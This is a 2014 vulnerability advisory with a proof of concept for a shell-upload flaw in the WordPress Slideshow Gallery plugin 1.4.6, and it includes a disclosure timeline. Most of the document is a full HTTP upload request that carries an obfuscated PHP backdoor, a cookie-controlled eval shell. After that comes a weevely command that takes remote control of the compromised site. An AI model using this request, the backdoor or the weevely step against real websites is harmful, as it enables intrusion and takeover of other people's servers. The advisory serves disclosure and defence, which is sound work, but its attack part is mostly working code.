Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability. 
Found by: Jesus Ramirez Pichardo
  @whitexploit
  http://whitexploit.blogspot.mx/
Date: 2014-08-28
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip 
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.

Description:

I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.

Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).

Proof of Concept (PoC):

1. An attacker uploads a PHP shell file (i.e. backdoor.php):

POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
Host: 192.168.31.128
Connection: keep-alive
Content-Length: 2168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
Accept-Encoding: gzip,deflate
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[id]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
Content-Disposition: form-data; name="Slide[order]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
Content-Disposition: form-data; name="Slide[title]"

Test Shell Upload 
------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
Content-Disposition: form-data; name="Slide[description]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
Content-Disposition: form-data; name="Slide[showinfo]"

both
------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
Content-Disposition: form-data; name="Slide[iopacity]"

70
------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
Content-Disposition: form-data; name="Slide[galleries][]"

1
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[type]"

file
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="image_file"; filename="backdoor.php" 
Content-Type: application/octet-stream

<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[image_url]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[uselink]"

N

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[link]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
Content-Disposition: form-data; name="Slide[linktarget]"

self
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="submit"

Save Slide
                      ------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
                      
2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.

#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit

Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
vulnerable website.

Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com) 
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure